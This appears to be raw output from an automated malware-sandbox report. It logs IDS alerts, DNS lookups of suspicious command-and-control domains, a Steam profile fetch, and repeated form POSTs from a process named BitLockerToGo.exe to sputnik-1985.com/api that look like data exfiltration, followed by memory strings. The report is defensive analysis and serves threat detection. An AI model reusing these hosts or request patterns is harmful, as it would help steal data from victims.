              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49770 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49787 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49796 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:62001 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:61984 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:62017 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:62024 -> 104.21.48.1:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1HOV66FNDB7NHBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GR9J0UZM8CJ54HBX912User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15090Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZYZGZAHRUJ4BYWGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20556Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IBNC1KXRCOYGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G1ZN91Z2ZWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1079Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampower equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampower equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ed.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ed.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9cf190a5d991b4bebe33d12e; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 10 Jan 2025 10:34:28 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.0Z' equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr^Z equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.youtube.com/ httjT equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com~T equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ttps://www.youtube.com h7Z: equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: enterwahsh.biz
              Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
              Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
              Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
              Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
              Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
              Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
              Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
              Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
              Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: 53.210.109.20.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steAT
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steamp
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowere
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.%T4
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.
              Source: BitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamFT
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampownZ
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
